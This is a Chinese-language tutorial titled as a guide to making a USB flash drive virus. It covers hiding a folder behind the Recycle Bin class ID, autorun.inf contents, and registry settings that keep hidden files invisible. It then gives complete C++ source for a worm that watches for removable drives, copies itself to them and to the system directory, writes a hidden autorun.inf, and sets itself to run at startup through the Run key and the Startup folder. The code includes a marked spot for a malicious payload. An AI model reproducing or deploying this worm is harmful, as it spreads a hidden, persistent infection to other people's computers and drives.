U盘病毒制作教程
知识点:
---------------------------------------------------------------新建文件夹的名字是:
回收站.{645FF040-5081-101B-9F08-00AA002F954E}
这样就可以隐藏里面的文件了,打开此文件夹的时候直接进入回收站
---------------------------------------------------------------
autorun.inf
[AutoRun]
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open=打开(&o)
shell\open\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
---------------------------------------------------------------
设置隐藏文件夹的属性不可见的注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue------>1
HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
Hidden------------>2
ShowSuperHidden--->1
---------------------------------------------------------------
关闭u盘自动播放功能:
1.关闭shell Hardware Detection 服务,并禁用此项服务
2.打开组策略(gpedit.msc)找到“计算机配置”----“管理模板”---“系统”-----“关闭自动播放”,进行设置
3.修改注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000000c
// 20130927.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <stdio.h>
//全局变量好办事
char U_path[]="a:\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}";//默认u盘路径为a
//获得正确U盘盘符
char GetUName()
{
char i;
char u_path[7]="";
for (i='a';i<='z';i++)
{
u_path[0]=i;
u_path[1]=':';
u_path[2]='\\';
u_path[3]='\\';
u_path[4]='\0';
if (GetDriveType(u_path)==DRIVE_REMOVABLE)
{
return i;
}
}
return NULL;
}
bool CheckDisk()
{
if (GetUName()!=NULL)
{
U_path[0]=GetUName();
return true;
}
return false;
}
//每过5秒扫描一次
void ScanDisk()
{
while (!CheckDisk())
{
Sleep(5000);
}
}
//病毒行为!
void VirusAction()
{
//
//
//双击U盘运行程序的AutoRun.inf
char f_inf_name[]="a:\\AutoRun.inf";
f_inf_name[0]=U_path[0];
char f_inf_content[]="[AutoRun]\r\nopen=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe\r\nshell\\open\\Command=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe\r\nshell\\explore\\Command=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe";
FILE *pf_inf = fopen(f_inf_name,"wb+");
if (pf_inf!=NULL)
{
fwrite(f_inf_content,sizeof(char),sizeof(f_inf_content),pf_inf);
fclose(pf_inf);
}
SetFileAttributes(f_inf_name,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
//
//拷贝到系统目录
char path_system[MAX_PATH];
GetSystemDirectory(path_system,MAX_PATH);
strcat(path_system,"\\20130927.exe");
char path_thisEXE[MAX_PATH];
GetModuleFileName(NULL,path_thisEXE,MAX_PATH);
//If this parameter is TRUE and the new file already exists, the function fails
CopyFile(path_thisEXE,path_system,TRUE);
//拷贝到U盘
CreateDirectory(U_path,NULL);
strcat(U_path,"\\20130927.exe");
CopyFile(path_thisEXE,U_path,TRUE);
//
//开机启动此程序
HKEY h_openkey;
DWORD cbData_1=200;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&h_openkey);
RegSetValueEx(h_openkey,"KeyName",0,REG_SZ,(BYTE*)path_system,cbData_1);
RegCloseKey(h_openkey);
char t_AutoStartPath[MAX_PATH]="C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动";
strcat(t_AutoStartPath,"\\20130927.exe");
CopyFile(path_thisEXE,t_AutoStartPath,TRUE);
//
//隐藏程序
//设置隐藏文件夹不可见
DWORD Data=2;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",0,KEY_ALL_ACCESS,&h_openkey);
RegSetValueEx(h_openkey,"Hidden",0,REG_DWORD,(const BYTE*)(&Data),sizeof(Data));//最后面的那个参数很重要
RegCloseKey(h_openkey);
//
//
//
// 此处可写你想做的的“罪恶行为”!
//
//
//
//
//执行U盘里那个程序,防止删除
if (strcmp(path_thisEXE,U_path)!=0) //只执行一次
{
WinExec(U_path,SW_HIDE);
}
else
{
while(1)//死循环永远不退出程序
{
Sleep(50*1000);//降低CPU负载
}
}
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
//主程序包括两部分:磁盘扫描和病毒感染
//磁盘扫描
ScanDisk();
//扫描不到U盘下个函数就不会执行
//病毒感染
VirusAction();
return 0;
}
Autorun.inf文件内容:
autorun病毒:
Autorun.inf
[AutoRun]
open=notepad.exe
shellexecute=notepad.exe
shell\Auto\command=notepad.exe
[AutoRun]
open=notepad.exe
shell\open=打开(&o)
shell\open\command=notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=notepad.exe
[AutoRun]
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open=打开(&o)
shell\open\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\explore\Command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe